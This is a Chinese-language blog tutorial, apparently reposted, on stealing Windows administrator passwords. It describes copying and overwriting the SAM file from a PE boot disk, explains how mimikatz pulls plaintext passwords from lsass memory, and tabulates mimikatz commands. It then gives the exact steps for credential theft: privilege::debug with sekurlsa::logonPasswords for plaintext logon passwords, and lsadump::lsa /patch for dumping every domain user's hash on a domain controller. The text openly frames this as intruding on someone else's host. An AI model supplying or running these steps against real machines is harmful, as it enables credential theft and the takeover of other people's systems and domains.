使用mimikatz抓取windows管理员密码
目錄
- 基于SAM文件的密碼破解
- Mimikatz是個啥?
- mimikatz基礎命令
- 抓取windows密碼
- 使用mimikatz讀取域控上所有域用戶的hash值
基于SAM文件的密碼破解
SAM文件即賬號密碼數據庫文件。 當我們登錄系統的時候,系統會自動地和 C:\Windows\System32\config\SAM 中的SAM文件自動校對,如發現此次密碼與SAM文件中的加密數據符合時,你就會順利登錄;如果錯誤則無法登錄。在系統運行期間,SAM文件一直是被占用的,是無法打開和編輯復制的,我們可以進入PE系統進行復制然后在利用軟件進行密碼的修改
U盤啟動,運行DiskGenius分區工具
找到 SAM 文件,復制到U盤
在另一臺電腦上下載軟件 NTPWedit 并運行,打開 SAM 文件,解鎖并修改密碼,然后把 SAM 文件復制到原來的電腦上,覆蓋原文件。或者我們可以直接利用工具(一般的啟動盤PE中都有密碼重置功能)一鍵重置。但是這樣就完美的暴露了我們入侵了對方的主機
注意:這樣只能修改密碼,并不能知道密碼的明文
Mimikatz是個啥?
mimikatz是一款功能強大的輕量級調試神器,通過它你可以提升進程權限注入進程讀取進程內存,他可以直接從 lsass中獲取當前處于Active系統的登錄密碼, lsass是微軟Windows系統的安全機制它主要用于本地安全和登陸策略,通常我們在登陸系統時輸入密碼之后,密碼便會儲存在 lsass內存中,經過其 wdigest 和 tspkg 兩個模塊調用后,對其使用可逆的算法進行加密并存儲在內存之中, 而mimikatz正是通過對lsass的逆算獲取到明文密碼!也就是說只要你不重啟電腦,就可以通過他獲取到登陸密碼,只限當前登陸系統!
注意:mimikatz的使用需要administrator權限,否則會提權失敗。
mimikatz基礎命令
| ? exit | 退出 |
| ? version | 查看mimikatz的版本 |
| ? system::user | 查看當前登錄的系統用戶 |
| ? system::computer | 查看計算機名稱 |
| ? process::list | 列出進程 |
| ? process::suspend 進程名稱 | 暫停進程 |
| ? process::stop 進程名稱 | 結束進程 |
| ? process::modules | 列出系統的核心模塊及所在位置 |
| ? service::list | 列出系統的服務 |
| ? service::remove | 移除系統的服務 |
| ? service::start stop 服務名稱 | 啟動或停止服務 |
| ? privilege::list | 列出權限列表 |
| ? privilege::enable | 激活一個或多個權限 |
| ? privilege::debug | 提升權限 |
| ? nogpo::cmd | 打開系統的cmd.exe |
| ? nogpo::regedit | 打開系統的注冊表 |
| ? nogpo::taskmgr | 打開任務管理器 |
| ? ts::sessions | 顯示當前的會話 |
| ? ts::processes | 顯示進程和對應的pid情況等 |
| ? sekurlsa::wdigest | 獲取本地用戶信息及密碼 |
| ? sekurlsa::tspkg | 獲取tspkg用戶信息及密碼 |
| ? sekurlsa::logonPasswords | 獲登陸用戶信息及密碼 |
抓取windows密碼
操作很簡單,兩步搞定
首先需要提權:privilege::debug
然后抓取明文密碼:sekurlsa::logonPasswords
使用mimikatz讀取域控上所有域用戶的hash值
第一步依然是提升權限:privilege::debug
第二步抓取密碼:lsadump::lsa /patch
總結
以上是生活随笔為你收集整理的使用mimikatz抓取windows管理员密码的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: EDG 官宣 Clearlove(明凯)
- 下一篇: 银联pos小票word模板_商家pos机